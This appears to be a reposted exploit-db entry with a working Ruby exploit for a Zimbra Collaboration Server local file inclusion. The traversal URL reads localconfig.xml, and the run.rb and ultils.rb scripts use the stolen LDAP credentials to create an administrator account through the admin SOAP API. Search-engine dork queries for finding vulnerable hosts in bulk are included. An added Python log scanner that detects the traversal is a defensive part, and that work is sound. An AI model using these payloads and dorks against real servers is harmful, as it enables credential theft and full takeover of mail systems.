Zimbra 0day exploit / Privilege escalation via LFI

Category: Vulnerability Era (漏洞时代)

Source: http://www.exploit-db.com/exploits/30085/

Affected versions: 2009, 2010, 2011, 2012 and early 2013
Test method:
http://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

https://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
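As an added defender-side example (not part of the original post or the exploit-db entry), this Python snippet scans web-server access log lines for the traversal pattern in the skin parameter of the resource bundler URL shown above. The log lines and IP addresses are constructed samples, and the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format assumed); the IPs
# are documentation addresses and the traffic is invented for this example.
SAMPLE_LOG = """\
203.0.113.10 - - [05/Dec/2013:10:01:12 +0000] "GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1" 200 5123
198.51.100.7 - - [05/Dec/2013:10:01:30 +0000] "GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=carbon HTTP/1.1" 200 48120
203.0.113.10 - - [05/Dec/2013:10:02:02 +0000] "POST /service/admin/soap HTTP/1.1" 200 812
192.0.2.44 - - [05/Dec/2013:10:03:00 +0000] "GET /zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=1&skin=..%252F..%252Fopt%252Fzimbra%252Fconf%252Flocalconfig.xml%2500 HTTP/1.1" 200 900
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def is_skin_traversal(target):
    """Return the decoded skin value when a request to the .js.zgz resource
    bundler carries path traversal or a NUL byte in skin=, else None."""
    parts = urlsplit(target)
    if "/res/" not in parts.path or not parts.path.endswith(".js.zgz"):
        return None
    for value in parse_qs(parts.query, keep_blank_values=True).get("skin", []):
        # parse_qs already decoded once; decode again so double-encoded
        # variants (..%252F) are normalised before matching.
        decoded = unquote(value)
        if "../" in decoded or "..\\" in decoded or "\x00" in decoded:
            return decoded
    return None

def scan_log(text):
    """Return (ip, status, decoded_skin) for every suspicious request line.
    A 200 on such a request means the server handed the file back."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        skin = is_skin_traversal(m.group("target"))
        if skin is not None:
            hits.append((m.group("ip"), int(m.group("status")), skin))
    return hits

if __name__ == "__main__":
    for ip, status, skin in scan_log(SAMPLE_LOG):
        print(f"{ip} status={status} skin={skin!r}")
```

A hit followed by POSTs to /service/admin/soap from the same source, as in the sample, is the sequence to look for when triaging.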

----------------Exploit-----------------
Before using this exploit, the target server must have the admin console port "7071" open, otherwise it won't work.
Use the exploit like this: ruby run.rb -t mail.example.com -u someuser -p Test123_23
[*] Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
[+] Login Credentials
[*] Login URL : https://mail.example.com:7071/zimbraAdmin/
[*] Account : someuser@example.com
[*] Password : Test123_23
[+] Successfully Exploited !
run.rb:
#!/usr/bin/ruby
#
# Author: Eduardo Rubina H.
# Email : rubina119[at]gmail.com
# Date : 03 Dec 2013
# State : Critical
#
# Description : This script exploits a Local File Inclusion in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz which allows us to see localconfig.xml
# that contains LDAP root credentials wich allow us to make requests in /service/admin/soap API with the stolen LDAP credentials to create user with administration privlegies
# and a lot of stuff also the lfi leets you see .bash_history, ssh pub keys, config files, etc.
#
#
# LFI : /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
#
#

require 'net/https'
require 'getoptlong'
require 'zlib'      # needed for Zlib::GzipReader
require 'stringio'  # needed for StringIO
require './ultils.rb'

data = nil

def exploit_begin()
  puts "[+] Looking if host is vuln..."
  http = Net::HTTP.new( $host, 7071 )

  http.use_ssl = true
  http.verify_mode = OpenSSL::SSL::VERIFY_NONE

  # The skin parameter is used as a path; the null byte cuts off the appended suffix.
  req = Net::HTTP::Get.new( "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00", { "Accept-Encoding" => "gzip", "User-Agent" => "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" } )
  res = http.request( req )

  case res
  when Net::HTTPSuccess then
    begin
      if res.header[ 'Content-Encoding' ].eql?( 'gzip' ) then
        sio = StringIO.new( res.body )
        gz = Zlib::GzipReader.new( sio )
        puts "[+] Host is vuln exploiting"
        resbody = gz.read()

        # The included file comes back embedded in the JS bundle; flatten it before matching.
        part1 = resbody.gsub("\n", ' ').squeeze(' ')
        part2 = part1.gsub("a[", '').squeeze(' ')
        ldap_user = part2.match(/name=\"zimbra_user\">"; "<value>(.*?)<\/value>/ui)[1]
        ldap_pass = part2.match(/name=\"zimbra_ldap_password\">"; "<value>(.*?)<\/value>/ui)[1]

        get_auth_token(ldap_user,ldap_pass)

      else
        puts "[-] Host is not vulnerable !"
        return false
      end
    rescue Exception
      #puts "[-] Connection Failed !"
      return false
    end
  end

end

def get_auth_token(user,pass)

  https = Net::HTTP.new( $host, 7071 )
  path = "/service/admin/soap"

  https.use_ssl = true
  https.verify_mode = OpenSSL::SSL::VERIFY_NONE

  body = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<env:Envelope xmlns:env=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:ns1=\"urn:zimbraAdmin\" xmlns:ns2=\"urn:zimbraAdmin\"><env:Header><ns2:context/></env:Header><env:Body><ns1:AuthRequest><account by=\"name\">#{user}</account><password>#{pass}</password></ns1:AuthRequest></env:Body></env:Envelope>"
  data = https.post(path, body, { "Content-Type" => "application/soap+xml; charset=utf-8; action=\"urn:zimbraAdmin#AuthRequest\"" } )
  $auth_key = data.body.match(/<authToken>(.*)<\/authToken>/iu)[1]
  exploit()

end

def exploit()

  puts "[+] Obtaining Domain Name"
  get_domain_soap_data = "<GetAllDomainsRequest xmlns=\"urn:zimbraAdmin\"></GetAllDomainsRequest>"
  get_domain = Utils.new.request_soap_admin(get_domain_soap_data)
  domain = get_domain.match(/<a n=\"zimbraDomainName\">(.*?)<\/a>/iu)[1]

  puts "[+] Creating Account"
  create_account_soap_data = "<CreateAccountRequest xmlns=\"urn:zimbraAdmin\"><name>#{$user}@#{domain}</name><password>#{$password}</password></CreateAccountRequest>"
  create_account = Utils.new.request_soap_admin(create_account_soap_data)
  a_id = create_account.match(/account id="(.*)" name="/ui)[1]

  puts "[+] Elevating Privileges"
  elevate_privs_soap_data = "<ModifyAccountRequest xmlns=\"urn:zimbraAdmin\"><id>#{a_id}</id><a n=\"zimbraIsAdminAccount\">TRUE</a></ModifyAccountRequest>"
  elevate_privs = Utils.new.request_soap_admin(elevate_privs_soap_data)

  puts "[+] Login Credentials"
  puts " [*] Login URL : https://#{domain}:7071/zimbraAdmin/ "
  puts " [*] Account : #{$user}@#{domain}"
  puts " [*] Password : #{$password}"
  puts "[+] Successfully Exploited !"

end

def usage
  print( "
  -t, --target
      Host to attack ip or domain

  -u, --useraccount
      The user name to be used to create the account, only alfanumeric chars.

  -p, --password
      Password that will be used to create the account,
      pass needs to be alfanumeric upercase and lowercase and special chars, minchar(8).

  -h, --help
      Print this help message

"
  )
end

puts ""
puts ""
puts "#########################################################################################"
puts "Zimbra Email Collaboration Server 0day Exploit by rubina119"
puts "#########################################################################################"
puts ""
puts ""

opts = GetoptLong.new(
  [ '--target', '-t', GetoptLong::REQUIRED_ARGUMENT ],
  [ '--useraccount','-u', GetoptLong::REQUIRED_ARGUMENT ],
  [ '--password','-p', GetoptLong::REQUIRED_ARGUMENT ],
  [ '--help','-h', GetoptLong::OPTIONAL_ARGUMENT ]
)
opts.each do |opt, arg|
  case opt
  when '--help'
    usage()
  when '--target'
    $host = arg
  when '--useraccount'
    $user = arg
  when '--password'
    $password = arg
  end
end

if $host == nil
  usage()
else
  exploit_begin()
end
ultils.rb
#!/usr/bin/ruby

require 'net/https'

class Utils

  # Wraps an admin API request in a SOAP envelope carrying the auth token obtained earlier.
  def request_soap_admin(api_call)

    @request=api_call

    soap_client = Net::HTTP.new( $host, 7071 )
    soap_client.use_ssl = true
    soap_client.verify_mode = OpenSSL::SSL::VERIFY_NONE

    soap_path = "/service/admin/soap"

    soap_data = "<soap:Envelope xmlns:soap=\"http://www.w3.org/2003/05/soap-envelope\"><soap:Header><context xmlns=\"urn:zimbra\"><authToken>#{$auth_key}</authToken></context></soap:Header><soap:Body>#{@request}</soap:Body></soap:Envelope>"

    response = soap_client.post(soap_path, soap_data, { "Content-Type" => "application/soap+xml; charset=utf-8; action=\"urn:zimbraAdmin\"" } )

    if response.body.match(/Error/)
      error_res = response.body.match(/<soap:Text>(.*?)<\/soap:Text>/ui)[1]
      puts "[-] Response Error"
      puts " [*] #{error_res}"
      false
    else
      return response.body
    end

  end
end

Bulk search method: title:zimbra web client sign in (tested on Baidu; one search turns up a large batch)
inurl:7071 -intext:7071 inurl:zimbra
inurl:7071 intitle:zimbra administration
Although some hosts do not have 7071 open, the config file can still be included; I don't know whether the encrypted data inside it can be cracked.

Tags: Zimbra LFI